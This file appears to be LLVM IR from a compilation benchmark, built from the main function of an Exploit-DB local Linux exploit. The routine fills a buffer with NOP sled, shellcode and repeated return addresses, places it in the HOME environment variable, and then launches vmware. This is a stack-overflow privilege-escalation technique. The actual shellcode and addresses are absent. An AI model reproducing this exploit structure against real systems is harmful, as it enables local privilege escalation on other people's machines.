; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19371.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_19371.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@buf = common dso_local global i32* null, align 8
@NOP = common dso_local global i32 0, align 4
@BUFFER = common dso_local global i32 0, align 4
@code = common dso_local global i32 0, align 4
@RET_ADDR = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [5 x i8] c"HOME\00", align 1
@PATH = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [7 x i8] c"vmware\00", align 1
@.str.2 = private unnamed_addr constant [9 x i8] c"-display\00", align 1
@.str.3 = private unnamed_addr constant [12 x i8] c"127.0.0.1:0\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  store i32 0, i32* %6, align 4
  %7 = load i32, i32* %3, align 4
  %8 = icmp sgt i32 %7, 1
  br i1 %8, label %9, label %14

9:                                                ; preds = %2
  %10 = load i8**, i8*** %4, align 8
  %11 = getelementptr inbounds i8*, i8** %10, i64 1
  %12 = load i8*, i8** %11, align 8
  %13 = call i32 @atoi(i8* %12)
  store i32 %13, i32* %6, align 4
  br label %14

14:                                               ; preds = %9, %2
  %15 = load i32*, i32** @buf, align 8
  %16 = load i32, i32* @NOP, align 4
  %17 = load i32, i32* @BUFFER, align 4
  %18 = call i32 @memset(i32* %15, i32 %16, i32 %17)
  %19 = load i32*, i32** @buf, align 8
  %20 = getelementptr inbounds i32, i32* %19, i64 800
  %21 = load i32, i32* @code, align 4
  %22 = load i32, i32* @code, align 4
  %23 = call i32 @strlen(i32 %22)
  %24 = call i32 @memcpy(i32* %20, i32 %21, i32 %23)
  store i32 856, i32* %5, align 4
  br label %25

25:                                               ; preds = %38, %14
  %26 = load i32, i32* %5, align 4
  %27 = load i32, i32* @BUFFER, align 4
  %28 = sub nsw i32 %27, 2
  %29 = icmp slt i32 %26, %28
  br i1 %29, label %30, label %41

30:                                               ; preds = %25
  %31 = load i32, i32* @RET_ADDR, align 4
  %32 = load i32, i32* %6, align 4
  %33 = add nsw i32 %31, %32
  %34 = load i32*, i32** @buf, align 8
  %35 = load i32, i32* %5, align 4
  %36 = sext i32 %35 to i64
  %37 = getelementptr inbounds i32, i32* %34, i64 %36
  store i32 %33, i32* %37, align 4
  br label %38

38:                                               ; preds = %30
  %39 = load i32, i32* %5, align 4
  %40 = add nsw i32 %39, 4
  store i32 %40, i32* %5, align 4
  br label %25

41:                                               ; preds = %25
  %42 = load i32*, i32** @buf, align 8
  %43 = call i32 @setenv(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0), i32* %42, i32 1)
  %44 = load i32, i32* @PATH, align 4
  %45 = call i32 @execl(i32 %44, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.2, i64 0, i64 0), i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.3, i64 0, i64 0), i32 0)
  ret void
}

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @memset(i32*, i32, i32) #1

declare dso_local i32 @memcpy(i32*, i32, i32) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @setenv(i8*, i32*, i32) #1

declare dso_local i32 @execl(i32, i8*, i8*, i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
